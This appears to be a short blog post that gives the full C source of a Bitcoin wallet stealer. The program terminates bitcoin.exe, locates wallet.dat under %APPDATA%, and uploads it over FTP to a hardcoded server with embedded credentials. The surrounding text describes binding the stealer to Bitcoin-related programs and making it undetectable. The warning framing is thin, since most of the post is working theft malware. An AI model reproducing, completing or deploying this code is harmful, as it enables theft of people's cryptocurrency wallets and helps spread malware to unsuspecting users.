The process is easy, this tiny C program look inside your computer appdata folder, if it finds the wallet.dat file, it uploads it into the hacker server using FTP, or file transfer protocol, the stealer it self is a virus, a hacking tool, a malware or you can name it what ever you want, because hackers use the same source but add features like infection spreading, USB spreading and that makes it more dangerous, same meaning, different names.
How hackers spread this stealer to the Bitcoin users, how they know I have Bitcoin?
well it's not so hard, bind the virus with a program that is related to Bitcoin, like "Bitcoin Stealer Maker" it self, and when someone download it, he lose his wallet.
the idea is that you should worry about your wallet, a virus can infect you one way or another, no matter if you are protected or not, people will always find a way to make the bitcoin virus FUD "Fully Undetectable" that makes it virtually impossible to notice.
-CODE-
#include <windows.h>
#include <tlhelp32.h>
#include <tchar.h>
#include <wininet.h>
#include <ctime>
#include <iostream>
#pragma comment(lib, "wininet")
void killprocess()
{
HANDLE hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0 );
// Get the process list snapshot.
PROCESSENTRY32 ProcessEntry = { 0 };
// Initialize the process entry structure.
ProcessEntry.dwSize = sizeof( ProcessEntry );
// Get the first process info
BOOL Return = FALSE;
Return = Process32First( hProcessSnapShot,&ProcessEntry );
int value = _tcsicmp(ProcessEntry.szExeFile, _T("bitcoin.exe"));
if (value==0)
{
HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, ProcessEntry.th32ProcessID);
//Open Process to terminate
TerminateProcess(hProcess,0);
CloseHandle(hProcess); //Close Handle }
}
while( Process32Next( hProcessSnapShot, &ProcessEntry ));
CloseHandle( hProcessSnapShot );
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
killprocess();
Sleep(40000);
srand((unsigned)time(NULL)); // we get time to use for random seed
int seedone=rand(); // seed one
int seedtwo=rand()*3; // seed two times 3
int seedboth = seedone + seedtwo; // combine seeds to ensure random int
// now we need to convert int to char
char randomseed[99]; // make randomseed buffer at 99 to prevent overflow
itoa(seedboth,randomseed,10); // use itoa, [int (seedboth), randomseed (random is now seedboth but in char), value (10 coverts to decimal)
// did this so the wallet.dat file wouldn't be overwritten in ftp because of same file name
char* appdata = getenv("APPDATA"); //Gets %Appdata% path
char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat"); //Bitcoin file to steal
//ftp connection
HINTERNET hInternet;
HINTERNET hFtpSession;
hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
hFtpSession = InternetConnect(hInternet, "ftp.host.com", INTERNET_DEFAULT_FTP_PORT, "user@host.com", "bigdickben", INTERNET_SERVICE_FTP, 0, 0); //ftp host, user, pass
FtpPutFile(hFtpSession, truepath , randomseed , FTP_TRANSFER_TYPE_BINARY, 0);
FtpPutFile(hFtpSession, truepath, randomseed, FTP_TRANSFER_TYPE_BINARY, 0);
InternetCloseHandle(hFtpSession);
InternetCloseHandle(hInternet);
return 0;
}
Full credit gose to : *Code 127.0.0.1*
No comments:
Post a Comment